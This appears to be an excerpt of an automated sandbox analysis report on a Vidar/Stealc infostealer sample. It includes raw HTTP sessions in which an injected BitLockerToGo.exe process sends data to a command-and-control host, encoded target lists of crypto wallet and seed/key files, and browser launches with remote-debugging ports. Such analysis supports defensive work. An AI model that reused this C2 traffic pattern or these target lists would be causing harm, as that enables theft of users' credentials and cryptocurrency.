                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:58 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                                                                                                                                                                  Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  58192.168.2.84983749.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:03 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 1081
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:03 UTC1081OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------ECFHJKEBAAECBFHIECGICont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:49:04 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  59192.168.2.84983849.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:05 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IECFBKFHCAEHJJKEGDGH
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:05 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 42 4b 46 48 43 41 45 48 4a 4a 4b 45 47 44 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------IECFBKFHCAEHJJKEGDGHContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------IECFBKFHCAEHJJKEGDGHCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:49:05 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:05 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  60192.168.2.84983949.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:07 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBK
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------CAFHDBGHJKFIDHJJJEBKCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:49:08 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:08 UTC1656INData Raw: 36 36 63 0d 0a 52 47 39 6a 64 57 31 6c 64 48 4e 38 4a 55 52 50 51 31 56 4e 52 55 35 55 55 79 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 44 4a 38 4b 6e 64 70 62 6d 52 76 64 33 4d 71 66 45 52 6c 63 32 74 30 62 33 42 42 62 47 78 38 4a 55 52 46 55 30 74 55 54 31 41 6c 58 48 77 71 4c 6e 52 34 64 48 77 31 4d 48 77 7a 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 52 56 4e 4c 56 45 39 51 64 32 46 73 62 47 56 30 66 43 56 45 52 56 4e 4c 56 45 39 51 4a 56 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 4b 69 77 71 63 32 56 6c 5a 43 6f 75 4b 69 77 71 59 6e 52 6a 4b 69 34 71 4c 43 70 72 5a 58 6b 71 4c 69 6f 73 4b 6a 4a 6d 59 53 6f 75 4b 69 77 71 59 33 4a 35 63 48 52 76 4b 69 34 71 4c 43 70 6a 62 32 6c 75 4b 69 34 71 4c 43 70 77 63 6d 6c 32 59 58 52 6c 4b 69 34 71 4c 43
                                                                                                                                                                                                                                                                                                                  Data Ascii: 66cRG9jdW1ldHN8JURPQ1VNRU5UUyVcfCoudHh0fDUwfDJ8KndpbmRvd3MqfERlc2t0b3BBbGx8JURFU0tUT1AlXHwqLnR4dHw1MHwzfCp3aW5kb3dzKnxERVNLVE9Qd2FsbGV0fCVERVNLVE9QJVx8KndhbGxldCouKiwqc2VlZCouKiwqYnRjKi4qLCprZXkqLiosKjJmYSouKiwqY3J5cHRvKi4qLCpjb2luKi4qLCpwcml2YXRlKi4qLC


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  61192.168.2.84984049.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:10 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FCAKFCGCGIEGDGCAAKKJ
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 461
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:10 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 4b 46 43 47 43 47 49 45 47 44 47 43 41 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 4b 46 43 47 43 47 49 45 47 44 47 43 41 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 4b 46 43 47 43 47 49 45 47 44 47 43 41 41 4b 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------FCAKFCGCGIEGDGCAAKKJContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------FCAKFCGCGIEGDGCAAKKJContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------FCAKFCGCGIEGDGCAAKKJCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:49:11 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:49:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                                  Start time:09:47:06
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                                                                                  Imagebase:0xaa0000
                                                                                                                                                                                                                                                                                                                  File size:5'526'528 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:0DA768D82B6B4B1CE65F888D4191A228
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.1596858257.0000000011A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                                  Start time:09:47:25
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                                                                                  Imagebase:0xf70000
                                                                                                                                                                                                                                                                                                                  File size:231'736 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                                  Start time:09:48:12
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                                  Start time:09:48:15
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff678760000
                                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                                                                  Start time:09:48:27
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                  Start time:09:48:28
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                                                  Start time:09:48:28
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                                                  Start time:09:48:29
                                                                                                                                                                                                                                                                                                                  Start date:21/11/2024
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
